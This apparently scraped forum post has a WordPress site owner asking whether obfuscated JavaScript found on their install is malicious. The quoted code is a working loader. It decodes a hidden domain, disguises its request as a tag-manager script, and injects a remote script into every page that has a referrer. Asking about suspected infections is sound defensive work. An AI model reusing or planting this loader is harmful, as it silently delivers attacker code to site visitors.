[ad_1]
I’m finding some strange code on one of my WordPress installs. It appears to be Javascript, but I’m beginner at best and this seems highly obfuscated. Is there a reason to believe this is malicious, or is it just some plugin/widget generating dynamic code which just happens to be difficult to understand for someone who doesn’t use JS every day?
!function (_c6e2cc) {
var _72151a = Date.now();
var _b7d157 = 1e3;
_72151a = _72151a / _b7d157;
_72151a = Math.floor(_72151a);
var _71211b = 600;
_72151a -= _72151a % _71211b;
_72151a = _72151a.toString(16);
var _d7bf6a = _c6e2cc.referrer;
if (!_d7bf6a) return;
var _479f04 = [21826, 21829, 21832, 21853, 21844, 21826, 21849, 21844, 21844, 21829, 21791, 21830, 21844, 21843, 21826, 21829, 21840, 21829, 21848, 21842, 21842, 21845, 21855, 21791, 21842, 21854, 21852];
_479f04 = _479f04.map(function (_b53f87) {
return _b53f87 ^ 21809;
});
var _30226 = "db799b87fafb22e8ad49736a297b3012";
_479f04 = String.fromCharCode(…_479f04);
var _da7ad4 = "https://";
var _40e1f1 = "/";
var _5c23c1 = "gtm-";
var _2357f4 = ".js";
var _802b01 = _c6e2cc.createElement("script");
_802b01.type = "text/javascript";
_802b01.async = true;
_802b01.src = _da7ad4 + _479f04 + _40e1f1 + _5c23c1 + _72151a + _2357f4;
_c6e2cc.getElementsByTagName("head")[0].appendChild(_802b01);
}(document);